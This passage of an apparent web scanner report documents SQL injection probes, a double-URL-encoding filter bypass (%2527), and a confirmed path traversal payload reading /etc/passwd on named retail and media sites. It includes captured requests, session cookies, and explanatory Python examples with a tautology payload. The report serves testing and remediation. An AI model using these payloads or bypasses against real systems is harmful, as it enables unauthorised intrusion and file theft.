Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:07:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/reg1 HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?bundleAdded=1891
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:07:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:07:18 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 159743
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

1.29. http://www4.jcpenney.com/jcp/JCPRoute.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www4.jcpenney.com
Path:   /jcp/JCPRoute.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In the exchange captured below, however, the single-quote request drew an HTTP 404 and the double-quote request an HTTP 400; both are generic IIS error responses, so the "error disappeared" signal the heuristic depends on is not actually present here, and the finding should be treated as unconfirmed until verified by other means.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /jcp%2527/JCPRoute.aspx?Target=PREPRINT_HOME&cmResetCat=True&CmCatId=70676&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105704 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; cmResetFlag=N; cmCat=EXTERNAL|G1_D6B_70676; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&DateShopperIdAssigned=02%2F25%2F2011&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 1

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Sat, 26 Feb 2011 04:55:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:35 GMT
Connection: close
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /jcp%2527%2527/JCPRoute.aspx?Target=PREPRINT_HOME&cmResetCat=True&CmCatId=70676&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105704 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; cmResetFlag=N; cmCat=EXTERNAL|G1_D6B_70676; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&DateShopperIdAssigned=02%2F25%2F2011&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 2

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 26 Feb 2011 04:55:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37

<html><body>Bad Request</body></html>

1.30. http://www4.jcpenney.com/jcp/freeship4u.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www4.jcpenney.com
Path:   /jcp/freeship4u.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with 1.29, the captured responses below are an HTTP 404 ("The system cannot find the file specified") for the single quote and an HTTP 400 for the double quote; neither is a normal page, so the behavioural difference is weak and the finding remains unconfirmed.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
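
Issues 1.29 and 1.30 share one root cause: the filter inspects the value after the web server's single URL-decode, and the application then decodes it a second time before use, so %2527 passes the filter as %27 and becomes ' at the point of use. The following is an added worked example, not code from the site or from the scanner, written in Python rather than the target's ASP.NET. The blocked character set, the function names and the path-segment values are assumptions; the payloads are the ones in the requests above.

```python
from urllib.parse import unquote

BLOCKED = set("'\"")   # the characters the filter refuses (assumed)

def validate(value):
    """Filter as deployed: rejects a value containing a quote character."""
    return not (set(value) & BLOCKED)

def server_decode(raw_segment):
    """The web server URL-decodes the path once before the application sees it."""
    return unquote(raw_segment)

def canonicalise(value, max_rounds=4):
    """Decode until the value stops changing; refuse inputs that keep changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("value did not stabilise after repeated decoding")

def app_vulnerable(raw_segment):
    """Validates the once-decoded value, then decodes it again before use."""
    once = server_decode(raw_segment)
    if not validate(once):
        return "blocked"
    used = unquote(once)          # the redundant second decode: %27 -> '
    return "used:" + used

def app_fixed(raw_segment):
    """Canonicalise first, validate the canonical form, then use that form
    unchanged; nothing downstream decodes it again."""
    canonical = canonicalise(server_decode(raw_segment))
    if not validate(canonical):
        return "blocked"
    return "used:" + canonical

if __name__ == "__main__":
    for raw in ("jcp", "jcp%27", "jcp%2527", "jcp%2527%2527"):
        print(f"{raw:16} vulnerable={app_vulnerable(raw):14} fixed={app_fixed(raw)}")
```

The fixed variant does what the remediation text asks for in either form: if the second decode is simply removed, the filter sees exactly what is used; if a canonicalisation step is kept, validation runs on its output and the output is what reaches the filesystem or database.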

Request 1

GET /jcp%2527/freeship4u.aspx?refpagename=X2%252Easpx&refdeptid=70676&refcatid=70676&cmAMS_T=X2&cmAMS_C=BANNER&cmAMS_V=X2V1&CmCatId=70676 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02/25/2011&ShopperType=XGN255; IsFirstTime=; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 1

HTTP/1.1 404 Not Found
ntCoent-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
nnCoection: close
Expires: Sat, 26 Feb 2011 04:55:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 103

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

Request 2

GET /jcp%2527%2527/freeship4u.aspx?refpagename=X2%252Easpx&refdeptid=70676&refcatid=70676&cmAMS_T=X2&cmAMS_C=BANNER&cmAMS_V=X2V1&CmCatId=70676 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02/25/2011&ShopperType=XGN255; IsFirstTime=; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 2

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 26 Feb 2011 04:55:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 37

<html><body>Bad Request</body></html>

1.31. http://www5.jcpenney.com/jcp/x6xml.aspx [grptyp parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www5.jcpenney.com
Path:   /jcp/x6xml.aspx

Issue detail

The grptyp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the grptyp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY'&itemid=1a6ddad&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Location: /jcp/UserError.aspx?exception=000
Pragma: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:39 GMT
Date: Sat, 26 Feb 2011 04:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fjcp%2fUserError.aspx%3fexception%3d000">here</a>.</h2>
</body></html>

Request 2

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY''&itemid=1a6ddad&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Pragma: no-cache
Content-Length: 0
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:40 GMT
Date: Sat, 26 Feb 2011 04:58:40 GMT
Connection: close


1.32. http://www5.jcpenney.com/jcp/x6xml.aspx [itemid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www5.jcpenney.com
Path:   /jcp/x6xml.aspx

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
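
The single-quote / double-quote differential used in 1.27, 1.28, 1.31 and 1.32 rests on SQL string-literal syntax: a lone ' leaves the literal unterminated and the statement fails to parse, while '' is the escaped form of a quote inside a literal, so the statement parses again and merely matches nothing. The following is an added worked example, not code from any of the scanned sites or from the scanner. It uses an in-memory SQLite table as a stand-in for whatever database the applications query (schema, engine and row data are constructed for the demonstration), shows the heuristic firing against string concatenation and staying silent against a bound parameter, and shows why a confirmed hit matters.

```python
import sqlite3

# Constructed fixture standing in for whatever table the scanned application
# consults; the real schema and database engine are unknown from the report.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE regions (code TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO regions VALUES (?, ?)",
                     [("USA", "United States"), ("GBR", "United Kingdom")])
    return conn

def lookup_unsafe(conn, region):
    """Vulnerable pattern: the cookie/parameter value is spliced into the SQL text."""
    sql = "SELECT name FROM regions WHERE code = '" + region + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, region):
    """Fixed pattern: a bound parameter is never parsed as SQL."""
    return conn.execute("SELECT name FROM regions WHERE code = ?",
                        (region,)).fetchall()

def probe(lookup, conn, base):
    """Replay the scanner's two probes, base + ' and base + ''.
    Returns {payload: ("ok", rows) | ("error", exception_name)}."""
    results = {}
    for payload in (base + "'", base + "''"):
        try:
            results[payload] = ("ok", lookup(conn, payload))
        except sqlite3.Error as exc:
            results[payload] = ("error", type(exc).__name__)
    return results

def looks_injectable(results, base):
    """The heuristic: one quote breaks the statement (unterminated literal),
    two quotes form an escaped quote inside the literal and it parses again.
    A parameterised query shows no such difference."""
    one, two = results[base + "'"], results[base + "''"]
    return one[0] == "error" and two[0] == "ok"

def classify(lookup, base="USA"):
    """Run the two-probe test against a fresh database and return the verdict."""
    conn = make_db()
    return looks_injectable(probe(lookup, conn, base), base)

if __name__ == "__main__":
    for name, fn in (("unsafe", lookup_unsafe), ("safe", lookup_safe)):
        print(name, probe(fn, make_db(), "USA"), "injectable:", classify(fn))
    # Impact once confirmed: a tautology in the string context returns every row.
    print(lookup_unsafe(make_db(), "USA' OR '1'='1"))
```

Note what the heuristic does not tell you: the 500 with an empty body in 1.27 and 1.28, and the redirect to UserError.aspx in 1.31 and 1.32, could equally come from any exception handler. Confirmation needs a second, independent signal (a data-dependent change in the normal page, or a time-based probe) before the severity is reported as more than tentative.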

Request 1

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY&itemid=1a6ddad'&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Location: /jcp/UserError.aspx?exception=000
Pragma: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:42 GMT
Date: Sat, 26 Feb 2011 04:58:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fjcp%2fUserError.aspx%3fexception%3d000">here</a>.</h2>
</body></html>

Request 2

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY&itemid=1a6ddad''&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Pragma: no-cache
Content-Length: 0
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:44 GMT
Date: Sat, 26 Feb 2011 04:58:44 GMT
Connection: close


2. File path traversal

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJ../../../../../../../../etc/passwd%00viewAdJ was submitted in the mName parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:
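
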